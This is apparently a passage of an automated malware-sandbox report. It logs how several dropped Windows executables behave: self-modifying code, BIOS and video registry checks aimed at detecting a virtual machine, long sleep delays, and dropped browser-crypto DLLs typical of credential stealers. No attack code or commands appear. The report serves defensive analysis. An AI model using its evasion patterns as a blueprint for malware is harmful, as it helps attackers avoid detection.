Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: 825A8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: 9D59AE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: 82337E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: 9DAEE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Special instruction interceptor: First address: A5B4EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Special instruction interceptor: First address: 85671C instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Memory allocated: 31C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Memory allocated: 51C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A70DA1 rdtsc

0_2_04A70DA1

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2724	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 533	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1837	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Window / User API: threadDelayed 913
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9269
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 351
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1127
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1065
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1116
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1124
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window / User API: threadDelayed 1139
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Window / User API: threadDelayed 9375

Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file

Source: C:\Program Files\Windows Media Player\graph\graph.exe

API coverage: 3.1 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7916	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7916	Thread sleep time: -654327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920	Thread sleep count: 336 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920	Thread sleep time: -672336s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep count: 313 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep time: -9390000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep count: 2724 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep time: -5450724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep count: 339 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep time: -678339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep count: 1390 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep time: -2781390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep count: 533 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -1066533s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep count: 1837 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -3675837s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904	Thread sleep count: 325 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904	Thread sleep time: -650325s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 2044	Thread sleep count: 32 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 2044	Thread sleep time: -32000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080	Thread sleep count: 52 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080	Thread sleep time: -52000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080	Thread sleep count: 59 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080	Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\audiodg.exe TID: 3528	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\audiodg.exe TID: 3528	Thread sleep count: 913 > 30
Source: C:\Windows\System32\audiodg.exe TID: 3528	Thread sleep time: -45650000s >= -30000s
Source: C:\Windows\System32\audiodg.exe TID: 5912	Thread sleep count: 108 > 30
Source: C:\Windows\System32\audiodg.exe TID: 5912	Thread sleep time: -291600s >= -30000s
Source: C:\Windows\System32\audiodg.exe TID: 3528	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 4496	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 4496	Thread sleep count: 967 > 30
Source: C:\Windows\System32\msiexec.exe TID: 4496	Thread sleep time: -48350000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 6948	Thread sleep count: 95 > 30
Source: C:\Windows\System32\msiexec.exe TID: 6948	Thread sleep time: -256500s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 4496	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1132	Thread sleep time: -8805550s >= -30000s
Source: C:\Windows\explorer.exe TID: 800	Thread sleep time: -270000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784	Thread sleep count: 46 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784	Thread sleep time: -46000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784	Thread sleep count: 68 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784	Thread sleep time: -68000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5836	Thread sleep count: 1127 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5836	Thread sleep time: -2255127s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 4480	Thread sleep count: 1065 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 4480	Thread sleep time: -2131065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576	Thread sleep count: 142 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576	Thread sleep count: 184 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576	Thread sleep count: 125 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 6364	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2352	Thread sleep count: 1125 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2352	Thread sleep time: -2251125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 3696	Thread sleep count: 1116 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 3696	Thread sleep time: -2233116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 892	Thread sleep count: 1124 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 892	Thread sleep time: -2249124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2356	Thread sleep count: 1139 > 30
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2356	Thread sleep time: -2279139s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6832	Thread sleep count: 72 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6832	Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe TID: 6620	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2932	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2932	Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 4028	Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 4028	Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6572	Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6572	Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 8072	Thread sleep time: -52000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2680	Thread sleep count: 51 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2680	Thread sleep time: -102051s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2084	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2084	Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 5448	Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 5448	Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 1356	Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 1356	Thread sleep time: -92046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6404	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6404	Thread sleep time: -120060s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed
Source: C:\Windows\System32\audiodg.exe	Last function: Thread delayed
Source: C:\Windows\System32\audiodg.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5E3CC FindClose,FindFirstFileExW,GetLastError,	9_2_00007FF643F5E3CC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	9_2_00007FF643F5E440
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F29B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	9_2_00007FF643F29B00
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F8070C FindFirstFileExW,	9_2_00007FF643F8070C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459E3CC FindClose,FindFirstFileExW,GetLastError,	11_2_00007FF68459E3CC
